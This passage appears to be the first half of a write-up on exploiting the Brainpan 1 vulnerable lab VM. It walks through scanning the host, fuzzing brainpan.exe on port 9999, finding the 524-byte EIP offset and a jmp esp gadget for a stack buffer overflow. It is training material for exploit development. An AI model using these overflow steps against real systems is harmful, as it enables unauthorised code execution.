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[1/2] Vulnerable VM: Brainpan 1

Last updated on 2019-12-23


Brainpan: 1, by superkojiman, can be found at,51/.


These two ports were really the only useful information nmap found:

Num/Type Name Product Version
9999/tcp abyss
10000/tcp http SimpleHTTPServer 0.6
If you’re unfamiliar with nmap, or curious about how I use it with my own scripts, see:

Some research on abyss running on port 9999 reveals it’s a web server. Let’s see what’s in there.

vagrant@attack-vm:~$ curl -s http://$ip:9999 --output ./abyss.txt
vagrant@attack-vm:~$ cat abyss.txt
_|                            _|
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD

                          >>                           ACCESS DENIED

A little weird, for a web server. Looks like it allows for a prompt, which we can confirm by using ncat.

vagrant@attack-vm:~$ ncat $ip 9999
_|                            _|
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD

                          >> testing123
                          ACCESS DENIED

Before guessing passwords, let’s have a look at the SimpleHTTPServer running on 10000.

vagrant@attack-vm:~$ curl -s http://$ip:10000 --output ./httpd.txt
vagrant@attack-vm:~$ cat ./httpd.txt
<body bgcolor="ffffff">
<!-- infographic from -->
<img src="soss-infographic-final.png">

I had been expecting a list of files here, since SimpleHTTPServer does exactly that:

The SimpleHTTPServer module can be used […] to set up a very basic web server serving files relative to the current directory.


To find out whether additional files or directories exist, let’s use gobuster with a short list.

vagrant@attack-vm:~$ wget -q
vagrant@attack-vm:~$ gobuster -u http://$ip:10000 -w ./raft-small-directories.txt
/bin (Status: 301)

Bingo! ;D

vagrant@attack-vm:~$ curl -s http://$ip:10000/bin/ --output ./bin.txt
vagrant@attack-vm:~$ cat bin.txt
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html>
<title>Directory listing for /bin/</title>
<h2>Directory listing for /bin/</h2>
<li><a href="brainpan.exe">brainpan.exe</a>

Vulnerability assessment

At this point, we can make a couple educated guesses:

  1. brainpan.exe is what’s running on port 9999
  2. This is a buffer overflow challenge

To confirm these guesses, let’s download that copy of brainpan.exe and use Wine to figure this out.

vagrant@attack-vm:~$ wget -q http://$ip:10000/bin/brainpan.exe
vagrant@attack-vm:~$ winedbg brainpan.exe
WineDbg starting on pid 0035
0036:err:console:AllocConsole Can't allocate console
0x000000007b465fc1: movl        0xffffff24(%ebp),%esi

Note that winedbg pauses the executable at the beginning, so you’ll need to hit c and Enter for winedbg to continue execution.

In another terminal, let’s send a large amount of data to our local instance of brainpan.exe.

vagrant@attack-vm:~$ python3 -c "print('1'*9999)" | ncat 9999

In the first terminal, where winedbg was running, you’ll not only see that brainpan.exe crashed, but we also overwrote the stack and a couple of registers with our payload of 9999 1s (the hexadecimal representation of the number 1 is 31).

Unhandled exception: page fault on read access to 0x31313131 in 32-bit code (0x0000000031313131).
Register dump:
 CS:0023 SS:002b DS:002b ES:002b FS:006b GS:0063
 EIP:31313131 ESP:0043f860 EBP:31313131 EFLAGS:00010202(  R- --  I   - - - )
 EAX:ffffffff EBX:7b63ee08 ECX:0043f640 EDX:0043f650
 ESI:7b63ee08 EDI:00000000
Stack dump:
0x000000000043f860:  3131313131313131 3131313131313131

After that, hit q and Enter to exit winedbg.

Vulnerability confirmed!


I’m partial to Radare, a reverse engineering framework which comes with a few utilities that’ll make short work of brainpan.exe.

I found the following blog post particularly helpful when learning about Radare:

To learn more about buffer overflows, I recommend watching LiveOverflow’s binary hacking series and playing with the VMs provided at

For starters, let’s see what happens when we crash the executable using a De Bruijn sequence crafted by ragg2, which is one of the utilities bundled with Radare.

In a new terminal (because the first one is running winedbg):

vagrant@attack-vm:~$ ragg2 -P 9999 -r | ncat 9999
Back in the first terminal, you’ll see:
Unhandled exception: page fault on read access to 0x43413243 in 32-bit code (0x0000000043413243).
Register dump:
 CS:0023 SS:002b DS:002b ES:002b FS:006b GS:0063
 EIP:43413243 ESP:0043f860 EBP:41314341 EFLAGS:00010202(  R- --  I   - - - )
 EAX:ffffffff EBX:7b63ee08 ECX:0043f640 EDX:0043f650
 ESI:7b63ee08 EDI:00000000
Stack dump:
0x000000000043f860:  4135434134434133 3843413743413643

The sequence 43413243 tells us that a specific section within our 9999 characters has made its way into EIP, the extended instruction pointer, which is the first mechanism we can use to modify the execution flow of brainpan.exe.

The second mechanism may be ESP, the extended stack pointer, which in this case points to 0043f860. Looking at the stack dump, it appears we also control the contents of that address.

By modifying our payload a little bit, we can shed some more light into this. First, let’s find out exactly where in the payload is the sequence that ended up in EIP.
vagrant@attack-vm:~$ ragg2 -q 0x43413243
Little endian: 524
Big endian: -1

In one terminal, first re-run winedbg brainpan.exe, hit c and Enter. In another terminal, let’s craft and deploy a new payload of size 524 with a few added characters.

vagrant@attack-vm:~$ printf "111122223333" > payload-suffix.txt
vagrant@attack-vm:~$ ragg2 -P 524 -r -C payload-suffix.txt | ncat 9999
Now have a look at the new output from winedbg:
Unhandled exception: page fault on read access to 0x31313131 in 32-bit code (0x0000000031313131).
Register dump:
 CS:0023 SS:002b DS:002b ES:002b FS:006b GS:0063
 EIP:31313131 ESP:0043f860 EBP:41314341 EFLAGS:00010202(  R- --  I   - - - )
 EAX:ffffffff EBX:7b63ee08 ECX:0043f640 EDX:0043f650
 ESI:7b63ee08 EDI:00000000
Stack dump:
0x000000000043f860:  3333333332323232 0000000000000300

Our 1111 made it to EIP while 22223333 made it to the location referenced by ESP.

Since we control EIP as well as the contents of ESP, we can use the simple ROP gadget jmp esp to take control of this executable.

Why jmp esp instead of a direct address on the stack? In short, sometimes the ESP address won’t be predictable, or will contain bytes that would break the payload.

Of course, this will only be possible if brainpan.exe contains a jmp esp instruction anywhere in its bits that will always be assigned to the same memory address at runtime.

Radare can help us once more with its /c command, used to search for specific instructions; in this case, /c jmp esp. Note that the Radare executable is r2.
vagrant@attack-vm:~$ r2 brainpan.exe
[0x31171280]> /c jmp esp
0x311712f3   # 2: jmp esp

(once again, q and Enter to quit r2)

Having found 0x311712f3 as an address containing jmp esp when brainpain.exe is running, we now have all the necessary pieces to exploit the executable.


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